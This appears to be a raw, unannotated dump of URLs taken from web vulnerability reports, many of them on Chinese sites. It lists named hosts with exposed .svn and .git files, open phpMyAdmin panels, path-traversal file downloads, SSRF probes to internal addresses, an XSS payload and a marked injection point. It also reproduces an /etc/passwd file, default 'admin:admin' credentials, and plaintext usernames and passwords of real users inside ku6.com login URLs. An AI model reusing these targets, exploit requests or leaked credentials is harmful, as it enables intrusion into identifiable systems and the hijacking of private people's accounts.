http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=6 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=6 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=6 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=2 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/saec-point/servicesheetlook.aspx?billno=1374092&no=3 http://www.huayiweibo.com/ http://**.**.**.**/index.aspx http://**.**.**.**/images/20150919105843648.aspx http://**.**.**.**/sc/media_news_detail.php?id=5480 http://219.141.188.51/ http://**.**.**.**/other/zhanwei.php?zph_id=59 URL:http://**.**.**.**/list.asp http://**.**.**.**/default.aspx http://**.**.**.**/minetypes_arr.php http://crm.chinawutong.com http://**.**.**.**/DBWechat/weixin/network.do?mhd=getcity&provinceid=1 http://mg.cmge.com/.svn/entries http://oss.cmge.com/.svn/entries http://user.cmge.com/.svn/entries https://**.**.**.**/hcsoft/lijiang-xinnonghe/blob/faf58fc9425d79ae384b25ddc8a818893a855c70/document/dizhi.txt jdbc:oracle:thin:@**.**.**.**:1521:orcl http://m.job168.com http://m.job168.com/channel/gzjz/list.jsp?board=1&page=2 http://m.job168.com:80/ www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 m.job168.com/sign/hrmanagement/index.html B96D24EE2A880B237EBD57F09FF3F250:FG=1 http://**.**.**.**:80/ https://117.121.10.35/.git/config http://library.suda.edu.cn/infoDetail.action?id=625&type_id=2 http://www.lib.hustwb.edu.cn/lib_cj/wedit.php?where=B http://www.lib.hustwb.edu.cn/lib_cj/category.php?action=cat_edit&id=826 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ 
http://www.hanqing.ruc.edu.cn/artice_list.php?class=gjjl&iClassID=34 http://**.**.**.**/search?q= http://**.**.**.** http://220.178.0.94/tk/manage/login.aspx http://www.lib.hustwb.edu.cn/lib_cj/wedit.php?where=N http://**.**.**.**/ http://**.**.**.**/service/service_jsp_catid_222.html http://www.waawo.cn/shops/network.php?province=16&city=226 http://www.waawo.cn/shops/purchase_area_offline.php?province=2&city=52&p=1 http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_college.aspx http://zjc.sicnu.edu.cn http://w.2177s.com:80/ https://112.126.83.148/phpMyAdmin/phpMyAdmin/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash URL:http://httpd.apache.org/docs/2.2/ URL:http://httpd.apache.org/docs/2.2/mod/directives.html http://112.124.212.5/index.php/Ask/index/type/3 http://210.75.250.227/www.zip URL:http://**.**.**.**/add.asp http://**.**.**.**/about.aspx?id=2 
http://eps.zzvcom.com/library/editornew/Editor/temp.asp http://eps.zzvcom.com/library/editornew/Editor/newimage/201591919503448968.asp http://**.**.**.**/channel.php?id=1 http://www.huozhan.com/ArticlesAction_detail.do?ID=187 http://www.saike.com/official/questions/question_view.php?question_id=3402 http://www.saike.com/official/questions/question_view.php?question_id=3402 http://**.**.**.**/Detail.aspx?userId=602&ID=402132 http://**.**.**.**/Detail.aspx?userId=574&ID=391831 http://**.**.**.**/Detail.aspx?userId=578&ID=398626 http://**.**.**.**/Detail.aspx?userId=602&ID=402132 http://**.**.**.**/Detail.aspx?userId=574&ID=391831 http://**.**.**.**/Detail.aspx?userId=578&ID=398626 http://**.**.**.**/Detail.aspx?userId=32&ID=409211 http://**.**.**.**/Detail.aspx?userId=580&ID=423092 http://**.**.**.**/Detail.aspx?userId=572&ID=405651 http://**.**.**.**/Detail.aspx?userId=600&ID=388951 http://**.**.**.**/Detail.aspx?userId=577&ID=403264 http://**.**.**.**/Detail.aspx?userId=570&ID=405517 http://**.**.**.**/Detail.aspx?userId=573&ID=404288 http://**.**.**.**/Detail.aspx?userId=531&ID=409953 http://**.**.**.**/Detail.aspx?userId=449&ID=410465 http://**.**.**.**/Detail.aspx?userId=368&ID=410590 http://**.**.**.**/Detail.aspx?userId=283&ID=393657 http://**.**.**.**/Detail.aspx?userId=535&ID=389329 http://**.**.**.**/Detail.aspx?userId=370&ID=381071 http://**.**.**.**/Detail.aspx?userId=369&ID=419152 http://**.**.**.**/Detail.aspx?userId=366&ID=402010 http://**.**.**.**/Detail.aspx?userId=272&ID=403909 http://**.**.**.**/Detail.aspx?userId=420&ID=388587 http://**.**.**.**/Detail.aspx?userId=371&ID=424203 http://**.**.**.**/Detail.aspx?userId=525&ID=393281 http://**.**.**.**/Detail.aspx?userId=501&ID=424273 http://**.**.**.**/Detail.aspx?userId=480&ID=412523 http://**.**.**.**/Detail.aspx?userId=520&ID=394281 http://**.**.**.**/Detail.aspx?userId=424&ID=403935 http://**.**.**.**/Detail.aspx?userId=252&ID=393186 http://**.**.**.**/Detail.aspx?userId=509&ID=383270 
http://**.**.**.**/Detail.aspx?userId=232&ID=424326 http://**.**.**.**/Detail.aspx?userId=453&ID=411612 http://**.**.**.**/Detail.aspx?userId=483&ID=423747 http://**.**.**.**/Detail.aspx?userId=444&ID=394227 http://**.**.**.**/Detail.aspx?userId=514&ID=422104 http://**.**.**.**/Detail.aspx?userId=198&ID=395524 http://**.**.**.**/Detail.aspx?userId=423&ID=423981 http://**.**.**.**/Detail.aspx?userId=409&ID=409420 http://**.**.**.**/Detail.aspx?userId=315&ID=392851 http://**.**.**.**/Detail.aspx?userId=109&ID=393168 http://**.**.**.**/Detail.aspx?userId=123&ID=410531 http://**.**.**.**/Detail.aspx?userId=485&ID=393869 http://**.**.**.**/Detail.aspx?userId=403&ID=392921 http://**.**.**.**/Detail.aspx?userId=93&ID=419045 http://**.**.**.**/Detail.aspx?userId=417&ID=361816 http://**.**.**.**/Detail.aspx?userId=481&ID=392006 http://**.**.**.**/Detail.aspx?userId=512&ID=393005 http://**.**.**.**/Detail.aspx?userId=517&ID=372139 http://**.**.**.**/Detail.aspx?userId=431&ID=418078 http://**.**.**.**/Detail.aspx?userId=35&ID=411785 http://**.**.**.**/Detail.aspx?userId=452&ID=392941 http://**.**.**.**/Detail.aspx?userId=455&ID=395799 http://**.**.**.**/Detail.aspx?userId=205&ID=394727 http://**.**.**.**/Detail.aspx?userId=484&ID=403185 http://**.**.**.**/Detail.aspx?userId=170&ID=391826 http://**.**.**.**/Detail.aspx?userId=450&ID=422454 http://**.**.**.**/Detail.aspx?userId=447&ID=424135 http://**.**.**.**/Detail.aspx?userId=479&ID=423717 http://**.**.**.**/Detail.aspx?userId=51&ID=412579 http://**.**.**.**/Detail.aspx?userId=141&ID=424329 http://**.**.**.**/Detail.aspx?userId=500&ID=371575 http://**.**.**.**/Detail.aspx?userId=434&ID=411646 http://**.**.**.**/Detail.aspx?userId=422&ID=416760 http://**.**.**.**/Detail.aspx?userId=482&ID=411664 http://**.**.**.**/Detail.aspx?userId=524&ID=423827 http://**.**.**.**/Detail.aspx?userId=19&ID=424144 http://**.**.**.**/Detail.aspx?userId=374&ID=407424 http://**.**.**.**/Detail.aspx?userId=20&ID=424314 
http://**.**.**.**/Detail.aspx?userId=416&ID=422140 http://**.**.**.**/Detail.aspx?userId=80&ID=423160 http://**.**.**.**/Detail.aspx?userId=24&ID=393399 http://**.**.**.**/Detail.aspx?userId=134&ID=391985 http://**.**.**.**/Detail.aspx?userId=199&ID=408524 http://**.**.**.**/Detail.aspx?userId=488&ID=417377 http://**.**.**.**/Detail.aspx?userId=426&ID=424243 http://**.**.**.**/Detail.aspx?userId=2&ID=415121 http://**.**.**.**/Detail.aspx?userId=559&ID=423740 http://**.**.**.**/Detail.aspx?userId=432&ID=402933 http://**.**.**.**/Detail.aspx?userId=355&ID=424061 http://**.**.**.**/Detail.aspx?userId=532&ID=390138 http://**.**.**.**/Detail.aspx?userId=33&ID=393417 http://**.**.**.**/Detail.aspx?userId=448&ID=408532 http://**.**.**.**/Detail.aspx?userId=511&ID=424249 http://**.**.**.**/Detail.aspx?userId=513&ID=409707 http://**.**.**.**/Detail.aspx?userId=231&ID=373617 http://**.**.**.**/Detail.aspx?userId=124&ID=423859 http://**.**.**.**/Detail.aspx?userId=601&ID=394582 http://**.**.**.**/Detail.aspx?userId=27&ID=415571 http://**.**.**.**/Detail.aspx?userId=30&ID=386533 http://**.**.**.**/Detail.aspx?userId=529&ID=409599 http://**.**.**.**/Detail.aspx?userId=39&ID=424311 http://**.**.**.**/Detail.aspx?userId=88&ID=424278 http://**.**.**.**/Detail.aspx?userId=155&ID=404096 http://**.**.**.**/Detail.aspx?userId=90&ID=424261 http://**.**.**.**/Detail.aspx?userId=478&ID=421395 http://**.**.**.**/Detail.aspx?userId=227&ID=362710 http://**.**.**.**/Detail.aspx?userId=34&ID=401604 http://**.**.**.**/Detail.aspx?userId=584&ID=394569 http://**.**.**.**/Detail.aspx?userId=659&ID=423780 http://**.**.**.**/Detail.aspx?userId=4&ID=385681 http://**.**.**.**/Detail.aspx?userId=178&ID=408840 http://**.**.**.**/Detail.aspx?userId=176&ID=407146 http://**.**.**.**/Detail.aspx?userId=598&ID=422280 http://**.**.**.**/Detail.aspx?userId=263&ID=412933 http://**.**.**.**/Detail.aspx?userId=590&ID=399617 http://**.**.**.**/Detail.aspx?userId=249&ID=420490 
http://**.**.**.**/Detail.aspx?userId=589&ID=412494 http://**.**.**.**/Detail.aspx?userId=408&ID=394194 http://**.**.**.**/Detail.aspx?userId=518&ID=388824 http://**.**.**.**/Detail.aspx?userId=37&ID=423298 http://**.**.**.**/Detail.aspx?userId=580&ID=423092 http://**.**.**.**/Detail.aspx?userId=599&ID=392240 http://**.**.**.**/Detail.aspx?userId=594&ID=424218 http://**.**.**.**/Detail.aspx?userId=14&ID=389861 http://**.**.**.**/Detail.aspx?userId=593&ID=412862 http://**.**.**.**/Detail.aspx?userId=544&ID=424259 http://**.**.**.**/Detail.aspx?userId=591&ID=397822 http://**.**.**.**/Detail.aspx?userId=579&ID=414104 http://**.**.**.**/Detail.aspx?userId=564&ID=412530 http://**.**.**.**/Detail.aspx?userId=560&ID=393395 http://**.**.**.**/Detail.aspx?userId=221&ID=396203 http://**.**.**.**/Detail.aspx?userId=347&ID=392378 http://**.**.**.**/Detail.aspx?userId=581&ID=415785 http://**.**.**.**/Detail.aspx?userId=592&ID=424331 http://**.**.**.**/Detail.aspx?userId=557&ID=382345 http://**.**.**.**/Detail.aspx?userId=470&ID=419685 http://**.**.**.**/Detail.aspx?userId=541&ID=418467 http://**.**.**.**/Detail.aspx?userId=31&ID=389968 http://**.**.**.**/Detail.aspx?userId=182&ID=424114 http://**.**.**.**/Detail.aspx?userId=597&ID=411362 http://**.**.**.**/Detail.aspx?userId=558&ID=424231 http://**.**.**.**/Detail.aspx?userId=492&ID=412549 http://**.**.**.**/Detail.aspx?userId=603&ID=424227 http://**.**.**.**/Detail.aspx?userId=438&ID=394212 http://**.**.**.**/Detail.aspx?userId=583&ID=409855 http://**.**.**.**/Detail.aspx?userId=551&ID=412564 http://**.**.**.**/Detail.aspx?userId=507&ID=419491 http://**.**.**.**/Detail.aspx?userId=569&ID=406214 http://**.**.**.**/Detail.aspx?userId=588&ID=392650 http://**.**.**.**/Detail.aspx?userId=442&ID=424146 http://**.**.**.**/Detail.aspx?userId=441&ID=422154 http://**.**.**.**/Detail.aspx?userId=559&ID=423854 http://**.**.**.**/Detail.aspx?userId=451&ID=402887 http://**.**.**.**/Detail.aspx?userId=549&ID=395520 
http://**.**.**.**/Detail.aspx?userId=546&ID=380847 http://**.**.**.**/Detail.aspx?userId=548&ID=409971 http://**.**.**.**/Detail.aspx?userId=598&ID=412667 http://**.**.**.**/Detail.aspx?userId=585&ID=409983 http://**.**.**.**/Detail.aspx?userId=555&ID=394388 http://**.**.**.**/Detail.aspx?userId=540&ID=409954 http://**.**.**.**/Detail.aspx?userId=554&ID=409844 http://**.**.**.**/Detail.aspx?userId=586&ID=412495 http://**.**.**.**/Detail.aspx?userId=563&ID=394402 http://**.**.**.**/Detail.aspx?userId=575&ID=412534 http://**.**.**.**/Detail.aspx?userId=567&ID=394437 http://**.**.**.**/Detail.aspx?userId=566&ID=394417 http://**.**.**.**/Detail.aspx?userId=565&ID=410994 http://**.**.**.**/Detail.aspx?userId=542&ID=423225 http://**.**.**.**/Detail.aspx?userId=561&ID=388396 http://**.**.**.**/Detail.aspx?userId=536&ID=393351 http://**.**.**.**/Detail.aspx?userId=553&ID=422942 http://**.**.**.**/Detail.aspx?userId=538&ID=394309 http://**.**.**.**/Detail.aspx?userId=439&ID=411650 http://**.**.**.**/Detail.aspx?userId=522&ID=424189 http://**.**.**.**/Detail.aspx?userId=84&ID=361557 http://**.**.**.**/Detail.aspx?userId=516&ID=408936 http://**.**.**.**/Detail.aspx?userId=543&ID=394321 http://**.**.**.**/Detail.aspx?userId=556&ID=404432 http://**.**.**.**/Detail.aspx?userId=193&ID=393377 http://**.**.**.**/Detail.aspx?userId=153&ID=396006 http://**.**.**.**/Detail.aspx?userId=562&ID=393367 http://**.**.**.**/Detail.aspx?userId=391&ID=367193 http://**.**.**.**/Detail.aspx?userId=496&ID=394271 http://**.**.**.**/Detail.aspx?userId=415&ID=387645 http://**.**.**.**/Detail.aspx?userId=527&ID=404713 http://**.**.**.**/Detail.aspx?userId=433&ID=411737 http://**.**.**.**/Detail.aspx?userId=497&ID=411142 http://**.**.**.**/Detail.aspx?userId=461&ID=392895 http://**.**.**.**/Detail.aspx?userId=23&ID=403905 http://**.**.**.**/Detail.aspx?userId=290&ID=423310 http://**.**.**.**/Detail.aspx?userId=20&ID=424054 http://**.**.**.**/Detail.aspx?userId=504&ID=416193 
http://**.**.**.**/Detail.aspx?userId=325&ID=424281 http://**.**.**.**/Detail.aspx?userId=491&ID=423971 http://**.**.**.**/Detail.aspx?userId=427&ID=416972 http://**.**.**.**/Detail.aspx?userId=358&ID=411027 http://**.**.**.**/Detail.aspx?userId=7&ID=424169 http://**.**.**.**/Detail.aspx?userId=150&ID=393789 http://**.**.**.**/Detail.aspx?userId=47&ID=410018 http://**.**.**.**/Detail.aspx?userId=428&ID=424267 http://**.**.**.**/Detail.aspx?userId=180&ID=372853 http://**.**.**.**/Detail.aspx?userId=397&ID=402913 http://**.**.**.**/Detail.aspx?userId=258&ID=404140 http://**.**.**.**/Detail.aspx?userId=359&ID=408169 http://**.**.**.**/Detail.aspx?userId=411&ID=402875 http://**.**.**.**/Detail.aspx?userId=367&ID=392884 http://**.**.**.**/Detail.aspx?userId=309&ID=392036 http://**.**.**.**/Detail.aspx?userId=477&ID=389777 http://**.**.**.**/Detail.aspx?userId=487&ID=424057 http://**.**.**.**/Detail.aspx?userId=351&ID=424276 http://**.**.**.**/Detail.aspx?userId=298&ID=391893 http://**.**.**.**/Detail.aspx?userId=351&ID=423979 http://**.**.**.**/Detail.aspx?userId=550&ID=424304 http://**.**.**.**/Detail.aspx?userId=400&ID=396903 http://**.**.**.**/Detail.aspx?userId=445&ID=416210 URL:http://shop.blued.cn http://luqiao.zjol.com.cn/sjh5/creative/bg/display.asp?classname2=%D0%C2%B0%B2%CE%F7%BD%D6&picid=2780 http://comment.aili.com//index.php?a=comment_sustain&cid=12 http://www.jsums.cn/admin/login.php http://**.**.**.**/index.php?m=Product&a=index&sex=1&sports=13&pclass=4存在注入点 http://**.**.**.**/pingjia_pic.jsp?pid=0&colid=18496 http://**.**.**.**/znss_zmm.jsp http://**.**.**.**/cjgklq2015cx2.jsp?pid=18500&id=112191 http://**.**.**.**/mstkcx2.jsp?pid=18474&id=110786 http://**.**.**.**/cjgklq2015cx2.jsp?pid=18500&id=112191 http://**.**.**.**/mstkcx2.jsp?pid=18474&id=110786 http://**.**.**.**/yjs2011cx2.jsp?pid=18500&id=11213 http://**.**.**.**/image.jsp?a= http://**.**.**.**/columnxx.jsp?pid=19041&colid=19042 http://**.**.**.**/html/news/article.asp?cid=18&top=6&asize=20 
http://**.**.**.**/3G/ccompanynew.asp?cid=672677 http://**.**.**.**/html/news/article.asp?cid=18&top=30&asize=12&isdt=y http://**.**.**.**/html/personal/Search_List3.asp?zw=1900&page=2 http://**.**.**.**/3G/ccompanynew.asp?cid=635573 http://**.**.**.**/Default.aspx www.vcanbio.com http://www.ku6.com/?account=cuixuesong&expire=on&password=wangqiao521@&x=47&y=18 http://www.ku6.com/?account=z439912678@163.com&expire=on&password=Zhao521%2B.%3F&x=0&y=0 http://admin.ljabc.com.cn/bull/toBullAuthentication.html http://**.**.**.**/index.php?c=article&a=type&tid=48 http://**.**.**.**/index.php?c=article&a=type&tid=48 http://oa.mfc.com.cn:81/ http://office.galaxyasset.com/tools/SWFUpload/upload.jsp https://**.**.**.**/hcsoft/lijiang-xinnonghe/blob/faf58fc9425d79ae384b25ddc8a818893a855c70/document/dizhi.txt http://www.nongfadai.com/password/ http://www.e-bridge.com.cn/ http://bhwsw.91huayi.com/page/pagel3.aspx?lm=1234 http://jcm.91huayi.com/login.aspx admin:admin http://www.huayiyuan.com/admincp.php http://bi.cisg.cn/biportal/index.jsp http://bi.cisg.cn/biportal/index.jsp http://www http://**.**.**.**/yuanyi/login/index.aspx http://**.**.**.**/help.asp http://**.**.**.**/WebSite/Default.aspx http://**.**.**.**/ http://job.shangdu.com/info.php?id=1 http://**.**.**.**:8081/WebNewsPaper.aspx?ID=20150203-A1 www.800bestex.com http://www.800bestex.com http://**.**.**.**/search.asp https://github.com/WillGuan105/myUpTime/blob/d46dff76c2265c3774f292b2204aaf57ea08cc4e/config/default.yaml_mls http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../classes/log4j.xml http://www.firefox.com.cn/ http://mozilla.com.cn/foxletter/verify/8a460d34f3e49868b67aa3d6f02202/ http://mozilla.com.cn/foxletter/verify/e90bb501f1e24adae4a3f711055a10/ http://broker2.esf.leju.com/login http://esf.sz.fang.com/ 
http://esf.sz.fang.com/Newsecond/DelegateAndJx/Eb_HouseList.aspx?indexid=29659&houseid=0&rawid=372015 URL:http://mail.ch.com/ URL:http://mail.tourspring.com/ URL:http://mail.springtour.com/ http://**.**.**.**/page/maint/login/Page.jsp?templateId=18 http://ifi.huayiweibo.com/webroot/login.php http://118.26.207.26:8080/webroot/ http://**.**.**.**/order/orderdetail?ordercodeonline=573967 http://oa.998.com/page/element/Weather/View.jsp?ebaseid=weather&eid=5 http://shangbu.fang.com/ http://shangbu.fang.com/shangpu/5518/ http://qianhai.fang.com/ http://91baby.mama.cn/api/img/wapimg.php?img=http://192.168.10.2 http://91baby.mama.cn/api/img/wapimg.php?img=http://192.168.10.4 http://dt.locojoy.com/.svn/entries http://cn.locojoy.com/.svn/entries http://sm.locojoy.com/.svn/entries http://www.touzhu.cn:80/ www.touzhu.cn http://**.**.**.**/doc/index.php?class=邮局相关 http://**.**.**.**/doc/index.php?class=邮局相关 http://**.**.**.**/common.asp?id=1 http://dealer.xin.com/ http://www.iliangcang.com:80/ http://**.**.**.**/news/newscontent.php?id=218 http://**.**.**.**/manage/index.php https://mobileapi.zhenai.com/login/login.do a0:fe/902985/1/868017029187502/com.zhenai.android/1920/1080/a7d4360e-4383-4908-8c95-80a365f1e8c3/3 a0:fe/902985/1/868017029187502/com.zhenai.android/1920/1080/a7d4360e-4383-4908-8c95-80a365f1e8c3/3 http://my.maxthon.cn/login.html http://cme.91huayi.com/pages/news_article.aspx?KeyLink=ggl&&info_id=08244472-766c-416e-a7a4-05365dd17071 https://**.**.**.**/XDZQ/hdj_login.shtml https://github.com/lekaijun/lekj_mz/blob/974f9f6191cebdc59cf173068d32c9805a15cf61/src/main/main/com/lekj/test/util/ClientTest.java http://www.trafree.com/OTA/2011/05\ http://www.trafree.com/ http://api.bk.17173.com/api/questionDetail/more http://m.bk.17173.com/question/detail?askid=1015756&from=mobile&classid=1009568 http://114.80.124.222:9000/phpMyAdmin/ http://114.80.124.222:8000/ http://www.bjwhk.com/index.php/home/search/search.html?key=88952634&=%E6%90%9C%E7%B4%A2 
http://91taoke.com/index.php?m=Help&a=lianxi&id=11 http://91taoke.com/index.php?m=Help& http://**.**.**.**/prod_item_list.php?class_id=98 http://**.**.**.**/prod_item_list.php?class_id=4 http://**.**.**.**/prod_item_list.php?class_id=1 http://**.**.**.**/prod_item_list.php?class_id=469 http://**.**.**.**/cn/prod_item_list.php?class_id=6 http://**.**.**.**/en/prod_item_list.php?class_id=28 http://**.**.**.**/china/prod_item_list.php?class_id=4 http://**.**.**.**/sp/prod_item_list.php?class_id=10 http://**.**.**.**/cn/prod_item_list.php?topage=3&class_id=4&series_id=0 http://**.**.**.**/shopping/prod_item_list.php?class_id=3 http://**.**.**.**/sp/news_detail.php?id=40 http://**.**.**.**/en/news_detail.php?id=3 http://**.**.**.**/jp/new_detail.php?id=16 http://**.**.**.**/news_detail.php?id=9&topage= http://**.**.**.**/news_detail.php?id=136&s=0&f=index http://**.**.**.**/ymca/news_detail.php?id=150 http://**.**.**.**/news_detail.php?id=3 http://**.**.**.**/news_detail.php?id=62&topage= http://**.**.**.**/forum_detail.php?forum_id=10&topage= http://**.**.**.**/forum_detail.php?forum_id=2 http://**.**.**.**/forum_detail.php?forum_id=17 http://**.**.**.**/forum_detail.php?forum_id=172&topage= http://**.**.**.**/e-shop/forum_detail.php?forum_id=2920&topage=57&dosearch=0 http://dm.cmge.com/webalizer http://**.**.**.**/coalport/coalport_2j.jsp?id=O15 http://**.**.**.**/Trade/Price/2015/price_qhd_page.jsp?place=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/Trade/Price/title/more_price.jsp?type=31 www.xin.com http://www.xin.com http://shebei.chinawutong.com/115.html?key=1 http://shebei.chinawutong.com/116.html?key=1 http://shebei.chinawutong.com/117.html?key=1 http://shebei.chinawutong.com/115.html?p=1&fn=1 http://shebei.chinawutong.com/115.html?p=1&fn=df&cn=1 http://219.223.252.215,ip反查地址是某大学研究生院,进入直接是phpmyadmin配置 
https://github.com/burgesst/manage/blob/8391b2ae2afc8221294c34204c23229854697b89/Man/src/test/resources/config/common/common.properties http://**.**.**.**/ http://**.**.**.**:9098/feedback/ http://**.**.**.**:9098/feedback/feedbackLogin.do?method=logon http://**.**.**//WorkFlow/WorkFlowListAll.aspx_ http://**.**.**//WorkFlow/WorkFlowListAll.aspx_ http://**.**.**//WorkFlow/WorkFlowListAll.aspx_ http://**.**.**//WorkFlow/WorkFlowListAll.aspx_ http://**.**.**///WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ybj.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ybj.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ybj.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ybj.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ 
http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_wt.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_wt.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_wt.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**//InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**//InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**//MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/InfoManage/zhiao/ziliao_all.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_all.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_yjj.aspx_ 
